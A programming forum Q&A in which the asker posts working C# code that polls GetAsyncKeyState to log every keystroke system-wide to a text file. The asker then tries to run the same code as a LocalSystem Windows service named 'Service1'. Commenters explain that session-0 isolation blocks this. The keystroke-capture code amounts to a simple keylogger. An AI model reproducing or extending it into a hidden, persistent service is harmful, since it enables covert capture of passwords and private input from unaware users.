# C# GetAsyncKeyState in a Windows Service

Tags: c#, service

I wrote the following EXE File in C#:

```
namespace Service
{
    class Program
    {
        [DllImport("user32.dll")]
        public static extern int GetAsyncKeyState(Int32 i);
        static void Main(string[] args)
        {
            StartLogging();
        }

        static void StartLogging()
        {
            while (true)
            {
                //sleeping for while, this will reduce load on cpu
                Thread.Sleep(10);
                for (Int32 i = 0; i < 255; i++)
                {
                    int keyState = GetAsyncKeyState(i);
                    if (keyState == 1 || keyState == -32767)
                    {
                        using (StreamWriter outputFile = new StreamWriter("C:\\Output.txt", true))
                        {
                            outputFile.WriteLine((Keys)i);
                        }
                        break;
                    }
                }
            }
        }
    }
}
```

This program captures every keyboard event, no matter in which program. It works fine.

Then i tried to put this into a Windows Service and it doesn't work.
The following code is my Service:

```
namespace Dienst
{
    public class Service : ServiceBase
    {
        [DllImport("user32.dll")]
        public static extern int GetAsyncKeyState(Int32 i);
        static void StartLogging()
        {
            while (true)
            {
                //sleeping for while, this will reduce load on cpu
                Thread.Sleep(10);
                for (Int32 i = 0; i < 255; i++)
                {
                    int keyState = GetAsyncKeyState(i);
                    if (keyState == 1 || keyState == -32767)
                    {
                        using (StreamWriter outputFile = new StreamWriter("C:\\TestNeu.txt", true))
                        {
                            outputFile.WriteLine((Keys)i);
                        }
                        break;
                    }


                }
            }
        }

        static void Main()
        {
            Service.Run(new Service());
        }

        protected override void OnStart(string[] args)
        {
            base.OnStart(args);
            StartLogging();
        }
        protected override void OnContinue()

        {
            base.OnContinue();
        }
        protected override void OnStop()
        {
            base.OnStop();
        }
    }


    [RunInstaller(true)]
    public class Installation : Installer
    {
        private ServiceInstaller service;
        private ServiceProcessInstaller process;

        public Installation()
        {
            service = new ServiceInstaller();
            process = new ServiceProcessInstaller();

            service.ServiceName = "Service1";
            service.DisplayName = "Service1";
            service.Description = "WindowsService";

            process.Account = ServiceAccount.LocalSystem;

            Installers.Add(process);
            Installers.Add(service);
        }
    }
}
```

The result from `GetAsyncKeyState(i)` is always 0.
Can anyone help me? I don't know, because this code as Service doesn't work.
And no, I don't want write a keylogger, only if someone think this.

Comment: Services usually run in session Id 0 which is not the same session as the current user. They cannot interact with the user session that you are running in, so it'll never detect your key presses.

Comment: Is there any possibility to run the service in the same session like the user? Or would global keyboard hooks solve this?

Comment: You'd have to run the service as the user account and set the "allow interact with desktop" option but that will only cover that user and not clear if it would pick up the key presses. Global hook should suffer the same issues

Comment: Oh that's a shame. But nevertheless thank you very much for your help.